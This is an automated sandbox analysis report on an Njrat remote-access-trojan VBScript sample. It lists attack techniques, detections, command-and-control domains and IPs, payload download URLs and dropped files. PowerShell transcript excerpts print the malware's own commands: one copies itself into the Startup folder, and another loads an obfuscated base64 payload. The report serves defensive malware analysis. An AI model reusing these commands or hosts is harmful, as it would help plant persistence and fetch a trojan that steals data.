Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	321 Scripting	2 Registry Run Keys / Startup Folder	212 Process Injection	1 Disable or Modify Tools	1 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	2 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	21 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	321 Scripting	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 PowerShell	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	12 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NJratccccassssG2.00.vbs	29%	Virustotal		Browse
NJratccccassssG2.00.vbs	15%	Metadefender		Browse
NJratccccassssG2.00.vbs	26%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
22.0.RegSvcs.exe.400000.1.unpack	100%	Avira	TR/Dropper.Gen7	Download File
22.0.RegSvcs.exe.400000.3.unpack	100%	Avira	TR/Dropper.Gen7	Download File
22.0.RegSvcs.exe.400000.2.unpack	100%	Avira	TR/Dropper.Gen7	Download File
22.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
22.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
22.0.RegSvcs.exe.400000.4.unpack	100%	Avira	TR/Dropper.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
venomsi.mypsx.net	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
venomsi.mypsx.net	11%	Virustotal		Browse
venomsi.mypsx.net	0%	Avira URL Cloud	safe
http://198.50.177.251	1%	Virustotal		Browse
http://198.50.177.251	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://njratcasanew.ueuo.comx	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://198.50.177.251/rump/4.txt	100%	Avira URL Cloud	malware
http://198.50.177.251x	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
njratcasanew.ueuo.com	162.253.155.226	true	false		high
venomsi.mypsx.net	201.121.59.253	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
venomsi.mypsx.net	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://njratcasanew.ueuo.com/NJratNEW%20casa/base%2064%20NJratNEWcasa.txt	false		high
http://198.50.177.251/rump/4.txt	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	false		high
http://njratcasanew.ueuo.com	powershell.exe, 00000010.00000002.354814544.000002164DEBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://198.50.177.251	powershell.exe, 00000010.00000002.354766020.000002164DE68000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	false		high
http://njratcasanew.ueuo.comx	powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://198.50.177.251x	powershell.exe, 00000010.00000002.354777323.000002164DE74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.313842082.000001A31D141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.361050610.0000021C28191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.353960268.000002164D941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.387789154.0000019748581000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.50.177.251	unknown	Canada	16276	OVHFR	false
201.121.59.253	venomsi.mypsx.net	Mexico	8151	UninetSAdeCVMX	true
162.253.155.226	njratcasanew.ueuo.com	United States	62838	REPRISE-HOSTINGUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	575468
Start date:	21.02.2022
Start time:	06:48:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	NJratccccassssG2.00.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@26/15@10/5
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 23.211.4.86
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:49:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs
06:49:40	API Interceptor	38x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czz05exg.e0h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jv2klgm1.r0q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpv40imj.k0g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phjaxqgs.pd0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tq5avew2.ytq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0iy51oe.tqh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfpndanb.rnb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdyg2daj.ovs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	115366
Entropy (8bit):	3.472337682596374
Encrypted:	false
SSDEEP:	384:5iMCCfz7IvJQ3FQ1/LMVeUOaPNoRq09dbelfkzgFSoaGBUgU01P:5ndXQ6Veh8kdbelfk0H7UgUE
MD5:	4833452ECE935EA45C3B0912DB2FC0BD
SHA1:	111BA6889BE1031376E62B1E87DD83041ACE2352
SHA-256:	965B43F6E33C4B12172F54BD6361F892A3C7F8AA6D75AC3A8665B090FF9D819F
SHA-512:	CCFBCF3730DC1E7204D8D92FC573E56B4F1EE7A7453BA07771701A84151085A8E2DC332477805631A735229A9D36AAD9C5FE28FE14D91FCAF208F7F669241D9E
Malicious:	true
Preview:	..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.9YlVrO_k.20220221064925.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	102854
Entropy (8bit):	3.973100578927352
Encrypted:	false
SSDEEP:	384:XPAD0T9ycxu3wqPzJBFyJEieId+hXHbPAD0T9ycxu3wqPzJBFyJEieId+hXHf:00F1qPzdID+I0F1qPzdID+f
MD5:	00BCA5EA9ECE68913DC9B5823258197E
SHA1:	1B1FE5B3C4104D5838AD7614BFFF5104394F0799
SHA-256:	4BBDCE8DAA075D50869F34D6C07E724AE532DFC048C8C77456B63532DDB4C884
SHA-512:	520B2BA07EFC4B93ECF6466681C7C9BF84022880717EBC2F263254EB39A9922AD36AA3D17D160BAE5D6B97D6E496838C1CF43D2CCBA5FEAA2726762201ECEA3A
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20220221064926..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $Codigo = 'J.BM.Eg.ZwBL.C..PQ.g.Cc.JQBN.Ek.UwBx.Eg.RwBL.Fo.TQBB.CU.Jw.7.Fs.QgB5.HQ.ZQBb.F0.XQ.g.CQ.ZgB1.FU.Tg.g.D0.I.Bb.FM.eQBz.HQ.ZQBt.C4.QwBv.G4.dgBl.HI.d.Bd.Do.OgBG.HI.bwBt.EI.YQBz.GU.Ng.0.FM.d.By.Gk.bgBn.Cg.I..k.Ew.S.Bn.Es.LgBy.GU.c.Bs.GE.YwBl.Cg.JwDmEEIgrC.n.Cw.JwBB.Cc.KQ.g.Ck.OwBb.FM.eQBz.HQ.ZQBt.C4.QQBw.H..R.Bv.G0.YQBp.G4.XQ.6.Do.QwB1.HI.cgBl.G4.d.BE.G8.bQBh.Gk.bg.u.Ew.bwBh.GQ.K..k.GY.dQBV.E4.KQ.u.Ec.ZQB0.FQ.eQBw.GU.K

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.IrFEJQAh.20220221064918.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1239
Entropy (8bit):	5.3131378372919205
Encrypted:	false
SSDEEP:	24:BxSA/xvBn8x2DOXWuVM7WGHjeTKKjX4CIym1ZJX1uVMhmnxSAZF:BZ5vh8oOGu9GqDYB1ZHusoZZF
MD5:	ABBA2F79C143435FFEFC40564E7EB2B9
SHA1:	E364108027FD5233D717DF9D8BC519DC9AA27396
SHA-256:	6F71874A81BD5A9FD90B59F1F8B6E7914B83DE25F2971376C03AE47B10A3012C
SHA-512:	3A9E0AF15DC4F9616913EEF11C9C151C5D9EF8885C6DA1DFF83C41B99C975D5FA2323C96DAAEBFD16A7B6452B82EBCFD165D9691E375B183C428D095E201A393
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220221064918..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')..Process ID: 6844..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220221064918..********************..PS>[System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Pro

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.ynx6k2_L.20220221064946.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3827
Entropy (8bit):	5.458157209925927
Encrypted:	false
SSDEEP:	96:BZ0h8NJXUqDo1ZHX/ZFh8NJXUqDo1ZoWYWIyWIyyIDZk:Y
MD5:	20BEAD40DD159B19D6595BBC7B424920
SHA1:	CFE0D8629C119206DEC401FF03013D0DD2E33CE8
SHA-256:	79372640C7984FB493A95757D61424309807723B064FDC30C9873E7C4387A304
SHA-512:	DAC315F3D2C63D0C24B00DF2E1DAB3DB4D045117F2767EE640B086084B8D4F729411F779F915DCD25D5020612F39C65F1CF9E8518C007FB21D21424E2692DAD3
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220221064946..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')..Process ID: 5184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220221064946..********************..PS>[System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\'

C:\Users\user\Documents\20220221\PowerShell_transcript.347688.yrGPxWUi.20220221064928.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	100362
Entropy (8bit):	3.8936693013819847
Encrypted:	false
SSDEEP:	384:9ycxu3wqPzJBFyJEieId+hXHInvaycxu3wqPzJBFyJEieId+hXHInvm:51qPzdID+6vO1qPzdID+6vm
MD5:	7FAB3ADED159CB4616DE5388430B373D
SHA1:	7083071532BAE040022592F43C86F1CFB2497FA3
SHA-256:	63BD0983915D3A21FBD9CFABD17B6E445218C6997E9EDA4C451FDB1430AB6187
SHA-512:	DBC4000730CEEDC7430039A5E762AE879EA2A223AE1A62859F40B5937862FC0CF8F249F81200FEA58CB0AE1E1044E9BF71976DB687C539DE5E14F8899C3D5392
Malicious:	false
